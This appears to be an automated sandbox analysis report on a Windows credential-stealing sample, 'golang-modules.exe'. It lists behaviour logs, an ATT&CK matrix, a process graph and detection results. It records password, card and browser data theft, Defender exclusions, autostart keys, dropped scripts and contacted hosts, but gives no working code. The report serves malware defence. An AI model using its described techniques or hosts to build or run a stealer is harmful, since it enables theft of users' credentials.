Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\curl.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849.zip VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\ProgramData\Steam\Launcher\EN-887849\Cards\Cards.txtJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\ProgramData\Steam\Launcher\EN-887849\Autofills\Autofills.txtJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\ProgramData\Steam\Launcher\EN-887849\Passwords\Passwords.txtJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts531
Windows Management Instrumentation
2
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
1
OS Credential Dumping
11
File and Directory Discovery
Remote Services21
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts21
Command and Scripting Interpreter
1
DLL Side-Loading
12
Process Injection
1
Obfuscated Files or Information
LSASS Memory133
System Information Discovery
Remote Desktop Protocol1
Clipboard Data
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
1
DLL Side-Loading
Security Account Manager421
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts2
PowerShell
21
Registry Run Keys / Startup Folder
21
Registry Run Keys / Startup Folder
1
File Deletion
NTDS3
Process Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Masquerading
LSA Secrets341
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Modify Registry
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items341
Virtualization/Sandbox Evasion
DCSync1
System Network Configuration Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1471277 Sample: golang-modules.exe Startdate: 11/07/2024 Architecture: WINDOWS Score: 100 90 ptb.discord.com 2->90 92 api.ipify.org 2->92 94 api.filedoge.com 2->94 110 Multi AV Scanner detection for domain / URL 2->110 112 Sigma detected: Powershell adding suspicious path to exclusion list 2->112 114 Multi AV Scanner detection for submitted file 2->114 116 9 other signatures 2->116 10 golang-modules.exe 88 2->10         started        signatures3 process4 dnsIp5 100 ptb.discord.com 162.159.136.232, 443, 49780 CLOUDFLARENETUS United States 10->100 78 C:\Users\user\AppData\...\CaptureScreens.ps1, Unicode 10->78 dropped 80 C:\ProgramData\edge\...\RunBatHidden.vbs, ASCII 10->80 dropped 82 C:\ProgramData\edge\...behaviorgraphet-Clipboard.ps1, ASCII 10->82 dropped 84 6 other files (4 malicious) 10->84 dropped 118 Suspicious powershell command line found 10->118 120 Uses cmd line tools excessively to alter registry or file data 10->120 122 Tries to harvest and steal browser information (history, passwords, etc) 10->122 124 3 other signatures 10->124 15 cmd.exe 1 10->15         started        18 cscript.exe 10->18         started        20 cmd.exe 10->20         started        22 31 other processes 10->22 file6 signatures7 process8 signatures9 144 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 15->144 146 Suspicious powershell command line found 15->146 148 Uses cmd line tools excessively to alter registry or file data 15->148 150 4 other signatures 15->150 24 powershell.exe 35 15->24         started        27 cmd.exe 1 15->27         started        29 cmd.exe 18->29         started        32 conhost.exe 18->32         started        34 cscript.exe 20->34         started        36 WMIC.exe 22->36         started        38 powershell.exe 22->38         started        40 curl.exe 1 22->40         started        43 28 other processes 22->43 process10 dnsIp11 74 C:\Users\user\AppData\...\oauixwyt.cmdline, Unicode 24->74 dropped 45 csc.exe 3 24->45         started        126 Uses cmd line tools excessively to alter registry or file data 29->126 128 Adds a directory exclusion to Windows Defender 29->128 48 powershell.exe 29->48         started        51 powershell.exe 29->51         started        53 reg.exe 29->53         started        59 3 other processes 29->59 55 cmd.exe 34->55         started        130 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 36->130 132 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 36->132 134 Queries memory information (via WMI often done to detect virtual machines) 36->134 76 C:\Users\user\AppData\...\CzwstUXyiQEbaNB.ps1, ASCII 38->76 dropped 136 Creates autostart registry keys with suspicious values (likely registry only malware) 38->136 138 Creates multiple autostart registry keys 38->138 57 csc.exe 38->57         started        96 api.ipify.org 104.26.13.205, 49779, 49782, 49783 CLOUDFLARENETUS United States 40->96 98 api.filedoge.com 49.13.193.134, 443, 49781 HETZNER-ASDE Germany 43->98 140 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 43->140 142 Writes or reads registry keys via WMI 43->142 file12 signatures13 process14 file15 86 C:\Users\user\AppData\Local\...\oauixwyt.dll, PE32 45->86 dropped 61 cvtres.exe 1 45->61         started        102 Loading BitLocker PowerShell Module 48->102 104 Creates multiple autostart registry keys 53->104 106 Uses cmd line tools excessively to alter registry or file data 55->106 108 Adds a directory exclusion to Windows Defender 55->108 63 powershell.exe 55->63         started        66 powershell.exe 55->66         started        68 conhost.exe 55->68         started        72 3 other processes 55->72 88 C:\Users\user\AppData\Local\...\wy53vvk1.dll, PE32 57->88 dropped 70 cvtres.exe 57->70         started        signatures16 process17 signatures18 152 Loading BitLocker PowerShell Module 63->152

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
golang-modules.exe7%VirustotalBrowse
golang-modules.exe5%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\pkg-d2MzMX\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd4420%ReversingLabs
C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node0%ReversingLabs
No Antivirus matches
SourceDetectionScannerLabelLink
ptb.discord.com0%VirustotalBrowse
api.filedoge.com11%VirustotalBrowse
api.ipify.org0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://url.spec.whatwg.org/#concept-url-origin0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape0%Avira URL Cloudsafe
https://mapbox.com/0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash0%Avira URL Cloudsafe
https://tools.ietf.org/html/rfc6455#section-1.30%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-Atom0%Avira URL Cloudsafe
https://gist.github.com/XVilka/8346728#gistcomment-28234210%Avira URL Cloudsafe
https://mapbox.com/0%VirustotalBrowse
https://url.spec.whatwg.org/#concept-url-origin0%VirustotalBrowse
https://github.com/nodejs/node-v0.x-archive/issues/2876.0%Avira URL Cloudsafe
https://tools.ietf.org/html/rfc6455#section-1.30%VirustotalBrowse
https://www.ecma-international.org/ecma-262/#sec-timeclip0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-Atom0%VirustotalBrowse
https://bugs.chromium.org/p/v8/issues/detail?id=107040%Avira URL Cloudsafe
https://console.spec.whatwg.org/#table0%Avira URL Cloudsafe
https://github.com/nodejs/node-v0.x-archive/issues/2876.0%VirustotalBrowse
https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape0%VirustotalBrowse
https://www.iana.org/assignments/tls-extensiontype-values0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/#sec-timeclip0%VirustotalBrowse
https://gist.github.com/XVilka/8346728#gistcomment-28234210%VirustotalBrowse
https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash0%VirustotalBrowse
https://console.spec.whatwg.org/#table0%VirustotalBrowse
https://github.com/nodejs/node/issues/354750%Avira URL Cloudsafe
https://github.com/chalk/ansi-regex/blob/HEAD/index.js0%Avira URL Cloudsafe
https://console.spec.whatwg.org/#console-namespace0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#url0%Avira URL Cloudsafe
https://www.iana.org/assignments/tls-extensiontype-values0%VirustotalBrowse
https://encoding.spec.whatwg.org/#textencoder0%Avira URL Cloudsafe
https://bugs.chromium.org/p/v8/issues/detail?id=107040%VirustotalBrowse
https://github.com/nodejs/node/issues/134350%Avira URL Cloudsafe
https://github.com/chalk/ansi-regex/blob/HEAD/index.js0%VirustotalBrowse
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash0%Avira URL Cloudsafe
https://github.com/tc39/proposal-weakrefs0%Avira URL Cloudsafe
https://goo.gl/t5IS6M).0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#url0%VirustotalBrowse
https://github.com/nodejs/node/issues/134350%VirustotalBrowse
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash0%VirustotalBrowse
https://console.spec.whatwg.org/#console-namespace0%VirustotalBrowse
https://tools.ietf.org/html/rfc7230#section-3.2.20%Avira URL Cloudsafe
https://nuget.org/nuget.exe0%Avira URL Cloudsafe
http://stackoverflow.com/questions/375198280%Avira URL Cloudsafe
https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d40%Avira URL Cloudsafe
https://github.com/nodejs/node/issues/354750%VirustotalBrowse
https://tools.ietf.org/html/rfc7230#section-3.2.20%VirustotalBrowse
https://github.com/tc39/proposal-weakrefs0%VirustotalBrowse
https://encoding.spec.whatwg.org/#textencoder0%VirustotalBrowse
http://stackoverflow.com/questions/375198280%VirustotalBrowse
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion0%Avira URL Cloudsafe
https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js0%Avira URL Cloudsafe
https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d40%VirustotalBrowse
https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object0%Avira URL Cloudsafe
https://github.com/ChALkeR0%Avira URL Cloudsafe
https://goo.gl/t5IS6M).0%VirustotalBrowse
https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion0%VirustotalBrowse
